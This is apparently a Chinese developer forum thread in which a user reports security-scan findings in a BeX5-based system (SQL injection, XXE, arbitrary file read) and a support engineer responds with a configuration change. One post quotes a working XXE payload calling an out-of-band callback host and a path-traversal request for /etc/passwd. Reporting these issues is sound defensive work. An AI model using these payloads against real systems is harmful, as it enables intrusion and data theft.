BeX5的安全性问题

xuxu

近期 公司安全部门对所有涉外的系统都做了一次安全检查
发现采用BEX5开发的系统存在以下安全问题,麻烦起步看看  能给个解决的方案,谢谢

1.bizData在保存数据的时候 存在sql注入漏洞

2.XXE漏洞（外部xml实体注入）,比如请求地址和参数如下:
请求地址:
http://xx.com/BusinessServer/bus ... tivity=mainActivity
参数:
{"contentType":"application/json","accept":"application/json","process":"/SA/doc/docSearch/docSearchProcess"
,"activity":"mainActivity","actionFlag":"__action_0__","executor":"","executeContext":"","action":"queryDocSearch"
,"parameters":{"param":{"@type":"xml","xml":"<!DOCTYPE netspi [<!ENTITY xxe SYSTEM \"http://oa.dvjfeh.ceye.io\" >]><data><operate>&xxe;</operate></data>"}},"translateParameter":null}

以上参数全是明文

3.任意文件读取漏洞,比如:
baas/justep/attachment/simpleFileStore?storeFileName=../../../../../../../../etc/passwd&ownerID=C48D1173350040F5AB993D928D2CE924&realFileName=&operateType=download

总结下,很多请求,不管get/post,都会将明文作为参数来传递
不知道X5是否提供了自动参数加解密的功能
如果没有,该如何解决该问题

jishuang

1.具体什么的sql注入？
2.把\runtime\UIServer\WEB-INF\justep.xml中
<request-use-base64>false</request-use-base64>
设置为
<request-use-base64>true</request-use-base64>

xuxu

jishuang 发表于 2018-1-15 16:27
1.具体什么的sql注入？
2.把\runtime\UIServer\WEB-INF\justep.xml中
false

有如下几个问题  我都截图了  麻烦看下 谢谢

xuxu

jishuang 发表于 2018-1-15 16:27
1.具体什么的sql注入？
2.把\runtime\UIServer\WEB-INF\justep.xml中
false

这些安全漏洞问题 貌似都和Business Server有关

jishuang

第一个aciton是自己的，具体怎么定义的？
第二个已经提交内部产品组（内部编号：2018012900043）